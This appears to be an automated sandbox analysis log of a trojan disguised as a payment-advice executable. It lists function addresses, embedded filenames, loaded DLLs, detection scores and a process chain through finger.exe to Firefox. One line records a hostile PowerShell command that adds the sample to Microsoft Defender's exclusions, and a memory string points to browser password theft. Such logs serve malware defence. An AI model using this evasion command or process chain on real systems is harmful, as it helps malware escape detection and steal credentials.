                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176FF094_2_0176FF09
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01673FD54_2_01673FD5
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01673FD24_2_01673FD2
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176FFB14_2_0176FFB1
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B1F924_2_016B1F92
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B9EB04_2_016B9EB0
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_04207AA78_2_04207AA7
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_04207C4B8_2_04207C4B
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_0422887B8_2_0422887B
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_0421206D8_2_0421206D
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_042098F38_2_042098F3
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_042098FB8_2_042098FB
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_042102DB8_2_042102DB
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeCode function: 8_2_04209B1B8_2_04209B1B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AC03E69_2_03AC03E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A0E3F09_2_03A0E3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABA3529_2_03ABA352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A802C09_2_03A802C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AA02749_2_03AA0274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AC01AA9_2_03AC01AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB41A29_2_03AB41A2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB81CC9_2_03AB81CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039F01009_2_039F0100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A9A1189_2_03A9A118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A881589_2_03A88158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A920009_2_03A92000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039FC7C09_2_039FC7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A007709_2_03A00770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A247509_2_03A24750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A1C6E09_2_03A1C6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AC05919_2_03AC0591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A005359_2_03A00535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AAE4F69_2_03AAE4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AA44209_2_03AA4420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB24469_2_03AB2446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB6BD79_2_03AB6BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABAB409_2_03ABAB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039FEA809_2_039FEA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A029A09_2_03A029A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ACA9A69_2_03ACA9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A169629_2_03A16962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039E68B89_2_039E68B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A2E8F09_2_03A2E8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A0A8409_2_03A0A840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A028409_2_03A02840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A7EFA09_2_03A7EFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039F2FC89_2_039F2FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A42F289_2_03A42F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A20F309_2_03A20F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AA2F309_2_03AA2F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A74F409_2_03A74F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A12E909_2_03A12E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABCE939_2_03ABCE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABEEDB9_2_03ABEEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABEE269_2_03ABEE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A00E599_2_03A00E59
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A18DBF9_2_03A18DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039FADE09_2_039FADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A0AD009_2_03A0AD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A9CD1F9_2_03A9CD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AA0CB59_2_03AA0CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039F0CF29_2_039F0CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A00C009_2_03A00C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A4739A9_2_03A4739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB132D9_2_03AB132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039ED34C9_2_039ED34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A052A09_2_03A052A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AA12ED9_2_03AA12ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A1D2F09_2_03A1D2F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A1B2C09_2_03A1B2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A0B1B09_2_03A0B1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ACB16B9_2_03ACB16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A3516C9_2_03A3516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039EF1729_2_039EF172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB70E99_2_03AB70E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABF0E09_2_03ABF0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A070C09_2_03A070C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AAF0CC9_2_03AAF0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABF7B09_2_03ABF7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB16CC9_2_03AB16CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A456309_2_03A45630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A9D5B09_2_03A9D5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AC95C39_2_03AC95C3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB75719_2_03AB7571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABF43F9_2_03ABF43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039F14609_2_039F1460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A1FB809_2_03A1FB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A75BF09_2_03A75BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A3DBF99_2_03A3DBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABFB769_2_03ABFB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A45AA09_2_03A45AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A9DAAC9_2_03A9DAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AA1AA39_2_03AA1AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AADAC69_2_03AADAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A73A6C9_2_03A73A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABFA499_2_03ABFA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB7A469_2_03AB7A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A959109_2_03A95910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A099509_2_03A09950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A1B9509_2_03A1B950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A038E09_2_03A038E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A6D8009_2_03A6D800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABFFB19_2_03ABFFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A01F929_2_03A01F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039C3FD59_2_039C3FD5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_039C3FD29_2_039C3FD2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABFF099_2_03ABFF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A09EB09_2_03A09EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A1FDC09_2_03A1FDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB7D739_2_03AB7D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A03D409_2_03A03D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB1D5A9_2_03AB1D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABFCF29_2_03ABFCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A79C329_2_03A79C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F520C09_2_02F520C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F587A09_2_02F587A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F625709_2_02F62570
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4CFB09_2_02F4CFB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4CFA89_2_02F4CFA8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4B3009_2_02F4B300
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4D1D09_2_02F4D1D0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4B1B09_2_02F4B1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F557909_2_02F55790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F557909_2_02F55790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F539909_2_02F53990
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F6BF309_2_02F6BF30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386E3289_2_0386E328
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386E7DC9_2_0386E7DC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386E4439_2_0386E443
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386D8A89_2_0386D8A8
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A35130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 039EB970 appears 262 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A47E54 appears 107 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A7F290 appears 103 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 0171EA12 appears 86 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 0172F290 appears 103 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 0169B970 appears 262 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 016F7E54 appears 107 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 016E5130 appears 58 times
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeBinary or memory string: OriginalFilename vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000000.1699625985.0000000000422000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenkffT.exe" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1864506338.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1867220338.00000000027F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1884536468.00000000059AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1876693113.00000000037B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1882139046.0000000005140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1887651837.0000000007130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.000000000179D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeBinary or memory string: OriginalFilenamenkffT.exe" vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, sb5XVGprnYjbJ1UAnT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, sb5XVGprnYjbJ1UAnT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@14/8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ousv2hhu.pyn.ps1Jump to behavior
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: finger.exe, 00000009.00000003.2417472699.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3551915780.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2417663608.00000000034D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeReversingLabs: Detection: 65%
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeVirustotal: Detection: 38%
                Source: unknownProcess created: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess created: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: appresolver.dllJump to behavior
